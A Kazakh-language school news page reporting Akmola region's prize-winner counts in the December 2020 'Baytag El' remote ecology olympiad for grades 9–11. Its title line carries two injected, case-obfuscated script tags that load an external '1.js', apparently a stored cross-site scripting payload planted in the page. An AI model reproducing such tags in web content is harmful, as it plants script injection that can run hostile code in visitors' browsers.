«Baytag El» республикалық қашықтық олимпиадасы бойынша ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.12.2020

2020 жылғы 22 желтоқсан күні Қазақстан Республикасы Білім және ғылым министрлігінің «Дарын» республикалық ғылыми-практикалық орталығы 9-11 сынып оқушыларына арналған экологиядан «Baytag El» республикалық қашықтық олимпиадасын өткізді.

Олимпиаданың мақсаты – оқушылардың экологиялық сауаттылығын арттыру, экология саласындағы заманауи процестер туралы түсініктерін кеңейту, қоршаған ортаның, жануарлар дүниесінің, денсаулық жағдайын жақсарту туралы танымдық қызығушылықтарын ынталандыру.

Олимпиадаға республиканың білім беру ұйымдарының  9-11  сынып оқушылары ерікті түрде қатыса алды.

Олимпиаданың қорытындысы бойынша Ақмола облысынан жеңімпаз атанған оқушылар:

  1. 9-сынып бойынша I орын – 49 оқушы, II орын – 37 оқушы, III орын – 51 оқушы.
  2. 10-сынып бойынша I орын – 28 оқушы, II орын – 32 оқушы, III орын –39 оқушы.
  3. 11-сынып бойынша I орын – 13 оқушы, II орын – 15 оқушы, III орын –29 оқушы.

Олимпиаданың жеңімпаздары мен жүлдегерлері Қазақстан Республикасы Білім және ғылым министрлігінің "Дарын" республикалық ғылыми-практикалық орталығының дипломдарымен марапатталады.

Жеңімпаздарымызды жеңістерімен құттықтаймыз!

 

Просмотров: 415


Пікір қосу



Деректерді қолтаңбаға қосу